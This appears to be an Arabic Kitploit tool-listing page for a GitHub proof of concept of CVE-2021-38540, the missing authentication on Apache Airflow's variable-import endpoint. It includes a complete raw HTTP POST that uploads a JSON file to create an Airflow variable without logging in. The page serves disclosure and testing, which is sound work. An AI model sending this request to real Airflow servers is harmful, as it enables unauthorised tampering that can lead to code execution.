Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-for-CVE-2021-38540- — غياب المصادقة على مكون حاسم CVE-2021-38540 | Kitploit
أدوات/GitHubGitHub/captain-v-hook/poc-for-cve-2021-38540-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةسوء التكوين
GitHubcaptain-v-hook/poc-for-cve-2021-38540-

PoC-for-CVE-2021-38540-

غياب المصادقة على مكون حاسم CVE-2021-38540

عرض المستودع
42منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-38540 إثبات المفهوم

مصادقة مفقودة على مكون حرج يُعرف باسم CVE-2021-38540

حول هذا الثغرة:

لم تكن نقطة نهاية استيراد المتغيرات محمية بالمصادقة في Airflow >=2.0.0، <2.1.3. وقد سمح ذلك للمستخدمين غير المصادقين بالوصول إلى تلك النقطة لإضافة/تعديل متغيرات Airflow المستخدمة في DAGs، مما قد يؤدي إلى رفض الخدمة أو كشف المعلومات أو تنفيذ تعليمات برمجية عن بُعد. تؤثر هذه المشكلة على Apache Airflow >=2.0.0، <2.1.3. [CVE-2021-38540]

حول إثبات المفهوم هذا:

يحتوي إثبات المفهوم هذا على طلب يقوم بإنشاء متغير باسم: kafka_captainhook_user ضمن Admin>variables [ List Variables ]

مصدر إثبات المفهوم:

root@kitploit:~
POST /variable/varimport HTTP/2
Host: airflow.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33976360506209910502051128075
Content-Length: 398
Origin: https://airflow.example.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="csrf_token"

 
-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="file"; filename="variables.json"
Content-Type: application/json

{
    "kafka_captainhook_user": "testCaptain"
}

-----------------------------33976360506209910502051128075--

المراجع

https://nvd.nist.gov/vuln/detail/CVE-2021-38540 https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E

تنزيل الأداة